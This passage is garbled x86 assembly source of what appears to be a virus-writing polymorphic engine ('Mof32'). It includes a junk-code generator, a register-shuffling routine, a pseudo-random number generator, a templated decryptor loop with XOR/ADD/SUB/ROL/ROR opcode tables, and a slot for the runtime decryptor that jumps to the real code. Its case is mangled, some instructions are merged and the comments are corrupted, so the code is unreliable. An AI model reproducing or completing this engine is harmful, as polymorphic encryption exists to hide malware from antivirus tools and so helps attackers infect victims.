DB 0
CLI
DB 0
STI
DB 0
CLD
DB 0
Table7_len = ($ -offset Table7) / 2
Tables label; this is useless in this
DD Offset Table1; Version
DD Offset Table2;
DD Offset Table3;
DD Offset Table4;
DD Offset Table5;
DD Offset Table6;
DD Offset Table7;
;
Table_numbers = ($ -offset tables) / 4; this is useful ...
Address_save DD 0
Junk_finish DD 0
Flawable dw 0
WE_CREATE_JCOND DB 0
First_INTEND DD 0
;?
?? JUNK generator module end?
;?
; ?????????????????????????????????????????? ???????????????????????????
; ?????????????????????????????????????????? ????????????????????????????
;? Here We Have The Place Where The Engine Chooses The Random Stuff.?
; ?????????????????????????????????????????? ????????????????????????????
Choose_random_registers proc near; Hele Choose the Random Regs
Pushad;
Lea EDI, [EBP Used_registers]; Point to Registers
Lea ESI, [EBP Used_registers]; Point to Registers
Mov Edx, ESI; Save Position
MOV ECX, 50H; Scramble 50h Times
;
Mangle:;
MOV Eax, 7;
Call Brandom32; Choose a Random Nr. Between 0-6
Mov EBX, EAX; in EBX
MOV Eax, 7;
Call Brandom32; Choose a Random Nr. Between 0-6
CMP EBX, EAX; in EAX
Je mangle; if eax = ebx choise again
Add Edi, Eax; Increment First Pointer
Add ESI, EBX; Increment Second Pointer
MOV Al, Byte Ptr [EDI]; and Exchange the VALUES
XCHG BYTE PTR [ESI], Al; BetWeen THEM
MOV BYTE PTR [EDI], Al;
Mov EDI, EDX; Restore Position
MOV ESI, EDX;
Loop mangle; and do it 50h Times
POPAD;
Retn;
Choose_random_registers endp;
;
Randomize proc NEAR;
Push Eax; this Randomize Procedure Must
MOV Eax, DWORD PTR [ESP-8]; Be Called First When The Word
Add DWORD PTR [EBP SEED], EAX; on the stack is smth. likepop eax; 0bf87 .... and it is different
Ret; for Each Loaded File Depending
Randomize Endp; on DiffERENT Thingies. The
Seed Gets Incremented Anyway
................
PUSH ECX;
XOR ECX, ECX;
MOV EAX, DWORD PTR [EBP SEED];
MOV CX, 33;
;
RLOOP:;
Add Eax, EAX;
JNC $ 4;
XOR Al, 197;
Loop rloop;
MOV DWORD PTR [EBP SEED], EAX;
POP ECX;
Ret;
Random32 ENDP;
SEED DD 0BFF81234H;
;
Brandom32 proc NEAR;
Push EDX; this Procedure Expects a value
PUSH ECX;
MOV EDX, 0; in Eax and Returns a Random
Push Eax; Number in Eax But Smaller Than
Call Random32; EAX'S Original Value. Actually
POP ECX; IT Bounds Eax (0 <= eax <= limited-1)
Div ECX; EDX and ECX Are Preserved
XCHG EAX, EDX;
POP ECX;
POP EDX;
Ret;
Brandom32 ENDP;
; ?????????????????????????????????????????? ????????????????????????????
;? Here We Have The Data on The Decryptor Generation.?
; ?????????????????????????????????????????? ????????????????????????????
Decryptor:
I01: MOV EBX, 0; MOV PREG, CODE_START
DB 0FEH;
I02: MOV EBX, 0; MOV KREG, Key
DB 0FEH;
I03: MOV EBX, 0; MOV LREG, CODE_LENGTH / 8
DB 0FEH;
I04: MOV EBX, DWORD PTR [EBX]; MOV CREG, [PREG] (Mainloop)
DB 0FEH;
I05: Add EBX, ECX; CREG, KREG
DB 0FEH;
I06: ROR EBX, 0H; CREG, Key2
DB 0FEH;
I07: Add EBX, DWORD PTR [EBX 4]; CREG, [PREG 4]
DB 0FEH;
I08: MOV DWORD PTR [EBX], EBX; MOV [PREG], CREG
DB 0FEH;
I09: Add EBX, 12345678H; Kreg, KeyValue
DB 0FEH;
I10: Add EBX, 4; SUB PREG, 4
DB 0FEH;
I11: SUB EBX, 1; SUB LREG, 1
DB 0FEH;
i12:; jnz 0; jnz mainloop
DB 0FH, 85H;
DD 0FEH;
DB 0FFH ;; ???????????????????????????????????????? ???????????????????????????????????????????????????????????????
Here We Have The Engine's General Data.?
; ?????????????????????????????????????????? ????????????????????????????
UN_OP_CODE1:
DB 33h; xor
DB 2bh; add
DB 03H; SUB
;
UN_OP_CODE2:;
DB 81H, 11110000B; XOR
DB 81H, 11101000B; SUB
DB 81H, 11000000B; Add
;
UN_OP_CODE3:;
DB 11000000B; ROL
DB 11001000B; ROR
;
Key DD 0;
Key2 DD 0;
KeyValue DD 0;
OP1 DD 0;
OP2 DD 0;
OP3 DD 0;
OP4 DD 0;
;
Used_registers:;
CREG DB 0; Register to Hold The Code
LREG DB 1; Register to Hold The Length of Code
Kreg DB 2; Register to Hold The Encryption Key
PREG DB 3; Register to Hold The Pointer in Code
JREG1 DB 5; JUNK Register # 1
JREG2 DB 6; JUNK Register # 2
JREG3 DB 7; JUNK Register # 3
;
Counter DD 0; Instruction Counter
MISC DB 0; MISC DATA
CodeAddr DD 0; Address of Code
Codelength DD 0; Code Length
Mainlp DD 0; main loop address
THE_END DD 0;
END_END DD 0;
;
Increment_flag db 0; Flag
;
Mof32 ENDP;
; ????????????????????? ?????????? ????????? ? ???????????
????????????????????????????????????????
; ????????????????????? ?????????? ????????? ? ???????????
; ????? ?????
??? M? U? L? T? I? P? L? EF? P? C? O? D? EF? A? N? T? A? S? I? E? S 3? 2 b? I? T???
; ????? e n d ?????
; ????????????????????? ?????????? ????????? ? ???????????
????????????????????????????????????????
; ????????????????????? ?????????? ????????? ? ???????????
END_OF_CODE:
Decrypt:; WHERE The runtime decryptor gets put ...
DB 700H DUP (90H);
JMP RealStart;
End:;
End Start;
END;
